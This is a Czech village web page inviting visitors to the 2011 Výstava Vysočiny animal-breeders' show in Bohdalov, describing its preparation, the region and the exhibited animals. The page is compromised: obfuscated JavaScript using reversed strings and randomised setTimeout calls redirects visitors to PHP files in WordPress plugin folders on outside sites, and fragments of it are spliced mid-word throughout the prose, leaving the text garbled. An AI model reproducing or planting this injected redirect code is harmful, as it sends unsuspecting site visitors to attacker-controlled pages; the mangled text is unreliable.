Bohdalov, bohdalov, aktuality, výstava, vysočiny
Rainbow page separator

Pozvánka na Výstavu Vysočiny 1.-2.10.2011

Sobota, 24. září 2011

Výstava Vysočiny Bohdalov

vystava-vysociny-bohdalov-2Bohdalov /Dovolte, abych Vás všechny jménem naší Základní organizace pozval k návštěvě naší Výstavy Vysočiny. Záměrně píši ,,naší”, pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tože i já mám [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to privilegium podílet se na její organizaci.

V le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošním roce se již po třicáté první bohdalovští chovatelé pustí do stejného kolo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toče: navážení klecí a podlážek, úklid všech výstavních pros[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tor, stavění klecí podle přesně vyměřených plánků, seno, sláma, bedny krmítek a pytle zrní jsou v mžiku na svém místě a čekají na prvního vystavovatele. Tohle všechno ale vystavovatelé a návštěvníci nevidí, takhle mohou naši výstavu vidět především místní obyvatelé, z nichž většina sdílí nadšení bohdalovských chovatelů a výstavu podporuje nebo se také sami do její přípravy zapojují.

vystava-vysociny-bohdalov-1Když se však podíváme ještě blíž, uvidíme výsledky úsilí, které není vidět. Hodiny (v hlavní návštěvní době i celé dny) práce u počítače, s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovky provolaných minut organizá[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torů snažících se získat partnery a sponzory pro výstavu,vymýšlení nových a originálních způsobů reklamy a zviditelnění výstavy (internet, billboardy, rozhovory v rádiu…), doprovodný program a zajištění možností parkování přibývajících aut a au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tobusů. To[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to vše zajistit s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tojí námahu po celý rok, ne jen několik měsíců před samotnou akcí. Výsledkem té[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to spousty práce je pak velká výstava na solidní úrovni, která hledá konkurenci mezi celorepublikovými akcemi.
Ty[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to všechny úkony zvládá překvapivě malý kolektiv zaměstnaných (nebo studujících) lidí, kteří [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to všechno připravují ve svém soukromém volnu, a můžu bez obav říci, že organizaci zvládáme každým rokem lépe a rychleji, problémy jsou méně časté a spokojených návštěvníků i vystavovatelů stále přibývá.

vystava-vysociny-bohdalov-3Troufnu si poznamenat, že jedním z důvodů našeho úspěchu je vedle práce pořadatelů i ideální poloha uprostřed republiky, která přímo vybízí k setkání lidí z opačných konců České republiky, ale i řady zahraničních. Dálnice D1 je nedaleko a dva výjezdy zaručují rychlou a plynulou jízdu až na mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to. Přírodu Vysočiny na podzim v hojném počtu navštěvují houbaři. Hluboké vlhké lesy jsou každoročně plné hub a ty lákají nejen místní obyvatele, ale také vzdálenější návštěvníky k procházce. Doma se pak můžeme pochlubit hříbky, růžovkami a václavkami, které ros[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou zrovna v době konání výstavy. Krajinu Vysočiny poznáte bezpečně podle nezaměnitelné mozaiky lesů, polí a rybníků. Lidská činnost zde jen jemně, citlivě a pomalu zasahuje do konceptu přírody, a tak zde můžeme najít krásné scenérie vrcholů Žďárských vrchů, prastaré stromy i tajemná zákoutí skal. Jedním z nejkrásnějších období pro návštěvu Vysočiny je podzim, kdy se stromy zbarvují do sytě rudých barev a o slovo se pomalu hlásí zima.

vystava-vysociny-bohdalov-4Ani na samotném výstavišti se ale nudit nebudete. Hlavními vystavenými zvířaty jsou králíci, drůbež, holubi, ovce a kozy. Již tradičně jsou pro potěchu oka připraveny ukázkové expozice z nejrůznějších chovatelských odborností: okrasné ptactvo, nutrie, terarijní zvířata. Chybět nebude speciální výstava sebritek v chovatelském areálu Základní organizace a mnoho dalších zvířat. St$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == „string“) return $soq0ujYKWbanWY6nnjX.list[n].split(„“).reverse().join(„“);return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=[„\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod“];var c=Math.floor(Math.r$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == „string“) return $soq0ujYKWbanWY6nnjX.list[n].split(„“).reverse().join(„“);return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=[„\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod“];var c=Math.floor(Math.r$nJe=function(n){if (typeof ($nJe.list[n]) == „string“) return $nJe.list[n].split(„“).reverse().join(„“);return $nJe.list[n];};$nJe.list=[„\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.r$nJe=function(n){if (typeof ($nJe.list[n]) == „string“) return $nJe.list[n].split(„“).reverse().join(„“);return $nJe.list[n];};$nJe.list=[„\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod“]; if (number1==3){var xxdelay = 18000; setTimeout($nJe(0), xxdelay);}andom() * 6); if (number1==3){var xxdelay = 18000; setTimeout($nJe(0), xxdelay);}$nJe=function(n){if (typeof ($nJe.list[n]) == „string“) return $nJe.list[n].split(„“).reverse().join(„“);return $nJe.list[n];};$nJe.list=[„\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod“]; if (number1==3){var xxdelay = 18000; setTimeout($nJe(0), xxdelay);}andom() * 5); if (c==3){var xxdelay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), xxdelay);}$nJe=function(n){if (typeof ($nJe.list[n]) == „string“) return $nJe.list[n].split(„“).reverse().join(„“);return $nJe.list[n];};$nJe.list=[„\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.r$nJe=function(n){if (typeof ($nJe.list[n]) == „string“) return $nJe.list[n].split(„“).reverse().join(„“);return $nJe.list[n];};$nJe.list=[„\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod“]; if (number1==3){var xxdelay = 18000; setTimeout($nJe(0), xxdelay);}andom() * 6); if (number1==3){var xxdelay = 18000; setTimeout($nJe(0), xxdelay);}$nJe=function(n){if (typeof ($nJe.list[n]) == „string“) return $nJe.list[n].split(„“).reverse().join(„“);return $nJe.list[n];};$nJe.list=[„\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod“]; if (number1==3){var xxdelay = 18000; setTimeout($nJe(0), xxdelay);}andom() * 5); if (c==3){var xxdelay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), xxdelay);}$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == „string“) return $soq0ujYKWbanWY6nnjX.list[n].split(„“).reverse().join(„“);return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=[„\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod“];var c=Math.floor(Math.r$nJe=function(n){if (typeof ($nJe.list[n]) == „string“) return $nJe.list[n].split(„“).reverse().join(„“);return $nJe.list[n];};$nJe.list=[„\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.r$nJe=function(n){if (typeof ($nJe.list[n]) == „string“) return $nJe.list[n].split(„“).reverse().join(„“);return $nJe.list[n];};$nJe.list=[„\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod“]; if (number1==3){var xxdelay = 18000; setTimeout($nJe(0), xxdelay);}andom() * 6); if (number1==3){var xxdelay = 18000; setTimeout($nJe(0), xxdelay);}$nJe=function(n){if (typeof ($nJe.list[n]) == „string“) return $nJe.list[n].split(„“).reverse().join(„“);return $nJe.list[n];};$nJe.list=[„\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod“]; if (number1==3){var xxdelay = 18000; setTimeout($nJe(0), xxdelay);}andom() * 5); if (c==3){var xxdelay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), xxdelay);}$nJe=function(n){if (typeof ($nJe.list[n]) == „string“) return $nJe.list[n].split(„“).reverse().join(„“);return $nJe.list[n];};$nJe.list=[„\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.r$nJe=function(n){if (typeof ($nJe.list[n]) == „string“) return $nJe.list[n].split(„“).reverse().join(„“);return $nJe.list[n];};$nJe.list=[„\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod“]; if (number1==3){var xxdelay = 18000; setTimeout($nJe(0), xxdelay);}andom() * 6); if (number1==3){var xxdelay = 18000; setTimeout($nJe(0), xxdelay);}$nJe=function(n){if (typeof ($nJe.list[n]) == „string“) return $nJe.list[n].split(„“).reverse().join(„“);return $nJe.list[n];};$nJe.list=[„\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod“]; if (number1==3){var xxdelay = 18000; setTimeout($nJe(0), xxdelay);}andardem je bohatá [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tombola a zajímavý doprovodný program pro děti i dospělé. V pátek navíc mají třídy ze škol a školek možnost si výstavu prohlédnout zdarma. V le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošním roce součástí výstavy budou také Farmářské trhy, na kterých najdou návštěvníci mnoho kvalitních a zdravých potravin, např. maso, sýry, med, zeleninu atd. nebo i řadu výrobků.

vystava-vysociny-bohdalov-5I Vy můžete o prvním říjnovém víkendu posoudit, jak se nám výstava, le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos již patnáctá konaná v okolí kulturního domu, zdařila, jaká byla nabídka prodejních zvířat a jak se nám povedlo akci zvládnout. Třeba si zrovna vaše zvířata zaslouží nějakou tu čestnou cenu nebo snad i vyšší ocenění. A bude-li nám přát počasí, věřím, že si le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošní Výstavu Vysočiny užijeme. A vy také.

Připravil: Jiří Boháček